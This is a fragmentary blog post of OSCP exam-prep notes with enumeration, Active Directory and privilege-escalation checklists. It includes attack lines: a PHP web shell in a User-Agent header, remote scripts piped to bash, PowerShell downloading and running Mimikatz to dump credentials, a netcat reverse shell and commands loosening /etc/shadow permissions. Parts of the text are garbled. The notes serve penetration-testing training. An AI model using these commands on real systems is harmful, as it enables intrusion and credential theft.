21 April 2022
I passed my OSCP in 2022 and wanted to contribute to the many helpful posts providing tips, tricks, and resources. I would also recommend referencing my GitBook for additional tooling and methodology.
Please keep in mind while reading this post that these are pretty much a direct copy of my rough notes.. As a result, there may be some unfinished thoughts, commands, and checklists contained within. Simple checklists help me not overthink - which coincidentally is my piece of advice for anyone attempting the OSCP.
Make sure while studying for the OSCP that you take lots of breaks, enjoy some coffee, and spend time with your friends and family. It’s no secret that the OSCP is tough, but struggling to exploit a machine or pass the first time doesn’t mean you’re any less of a hacker than the rest of us.
These are articles that Offensive Security has created and will answer several questions you may have about the exam. For example, what tooling is allowed and what the exam structure will look like.
Resources from the community that I found helpful while preparing for my exam.
Resources that I recommend checking out while preparing for the OSCP. For my preparation, I completed every Proving Ground Practice machine and several NetSecFocus HackTheBox recommendations. Additionally, I found S1REN’s walkthroughs incredibly helpful, they provide a great view of how you should be tackling machines.
This is my generic checklist and a baseline for every single box:
nmap -sV -sC -p- --min-rate=1000 -iL [scope] -oA Full-TCP-Scan
nmap -sUC --top-ports 1000 --min-rate=1000 -iL [scope] -oA Top-1000-UDP-Scan
dig axfr $ip
Simple notes for Active Directory during the OSCP:
# Enumerate all local users net user # Enumerate all users in the domain net user /domain # Enumerate a specified user net user $username /domain
1. Gain access to a domain user account. 2. Enumerate the domain with the commands listed above. 3. Enumerate all computers on the domain. Don't just enumerate one computer.. Enumerate them all. 4. Enumerate all users logged onto computers that we have local administrator access to. 5. Kerberoast with any user account acquired (GetUserSPNs, Invoke-Kerberoast, etc) 6. Attempt credential-based attacks against all discovered user accounts. 7. Pass the Hash to pivot (Also try to Pass the Ticket if applicable). 8. Run Mimikatz on all systems (Can also run LSASSY with CrackMapExec). 9. Enumerate password hashes and tickets: `sekurlsa::logonpasswords` and `sekurlsa::tickets`.
This checklist serves as a very basic web server checklist:
robots.txtto enumerate any additional information about the site.
admin:adminor credentials identified via Google for the application.
This checklist serves as a very basic Windows checklist:
- Run SMBMap against any identified SMB services: smbmap -H $ip - Access SMB shares manually with smbclient: `smbclient \\$ip\$share - Revisit all services with any identified credentials such as SSH, SMB, FTP, HTTP. - Get the naming context of LDAP: ldapsearch -h $ip -x -s base namingcontexts - After identifying the naming context, enumerate more: `ldapsearch -h $ip -x -b "DC=htb,DC=local" - Enumerate RPC with rpcclient: `rpcclient -U '' $ip - Some interesting flags for rpcclient are: `enumdomusers`, `queryuser parzival`, `querydomgroups`, and `querydispinfo` - Enumerate LDAP without credentials: ldapsearch -x -h $ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
davtest -auth $user:[PASSWORD] -sendbd auto -url http://$ip
This checklist serves as a reminder for what I needed to install prior to taking my OSCP exam, you don’t want to spend the first few hours of your exam setting up an environment:
# Full-TCP-Scan nmap -sV -sC -p- --min-rate 1000 -T4 $ip -oA Full-TCP-Scan # Top-UDP-Scan nmap -sU --top-ports 1000 -T4 $ip -oA Quick-UDP-Scan # Vulnerability Scan nmap -p $discoveredports --script=vuln $ip -oA Vuln-Scan
nmap -sCshould successfully enumerate users, it is always good to double check:
ident-user-enum $ip 22 53 113
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
.sh. This directory exists when Apache gives a file over to bash or another scripting language.
parzivaltry and login with the password
VRFYto enumerate a valid email prior to execution.
User-Agent: <?php system(\$_GET['c']); ?>
id_rsafile for any users that have been enumerated.
curl 10.10.10.1:8080/linpeas.sh | bash
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
mysql -u root -p
docker run -v /:/mnt --rm -it [IMAGE] chroot /mnt sh
Invoke-MS16032as examples. Their
Mimikatz.ps1is also great. These can be accessed at the following location Kali:
reg query HKCU /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.119.164:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -Command lsadump::sam
C:\Program Files (x86)for any outdated and vulnerable installations.
runascommand in combination with a binary like netcat:
runas /env /profile /user:[DOMAIN]\Administrator "C:\Windows\Tasks\nc.exe -e cmd.exe $attackerip 443"
Some additional resources I referenced throughout Windows privilege escalation
We can privesc in multiple ways from running this script. For example, we can add a root user to the /etc/passwd file or we can run
/bin/bash -p to obtain a shell with root privileges.
import os def stop(text,value): os.system("chmod 777 /etc/passwd"); def reset(text,value): os.system("chmod +s /bin/bash"); def start(text,value): os.system("chmod 777 /etc/shadow");
GetUserSPNs.py -request 'DOMAIN/MACHINE$' -dc-ip $dcip -hashes 'LM:NTLM'
net user /domain
net user $user /domain
net group /domain
klistto see if there are any tickets stored in memory. This can also be performed with Mimikatz by running:
tgsrepcrack.pyor your favorite password cracking tool.
Get-NetLoggedOn -ComputerName [COMPUTER]
Get-NetSession -ComputerName [DC]
Get-NetUser -SPN | select serviceprincipalnamePerform Kerberoasting with PowerView.
|Invoke-Kerberoast](https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/)Invoke-Kerberoast -OutputFormat HashCat||Select-Object -ExpandProperty hash|
- curl: `curl http://$attackerip/winpeas.exe -o winpeas.exe` - wget: `wget http://$attackerip/winpeas.exe -O winpeas.exe`
1. `impacket-smbserver parzival [TARGET_DIRECTORY]` 2. Validate the share is accessible: `net view $attackerip` 3. Copy the file to a local directory: `copy \\$attackerip\parzival\winpeas.exe` 4. Alternatively, run the file directly from the SMB share: `\\$attackerip \parzival\winpeas.exe`
(New-Object System.Net.WebClient).DownloadFile("http://$attackerip/winpeas.exe", "C:\Windows\Temp\winpeas.exe")Invoke-WebRequest "http://$attackerip/winpeas.exe" -OutFile "C:\Windows\Temp\winpeas.exe"powershell.exe -c "iwr http://$attackerip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe
While the Buffer Overflow has since been removed from the exam environment, it still provides a great introduction to low-level exploit development. After obtaining your shiny new certification, I would still recommend checking out publcily available resources.
NULL (\0) Tab (\t) Line Feed (\n) Carriage Return (\r) Form Feed (\f)Common Bad Characters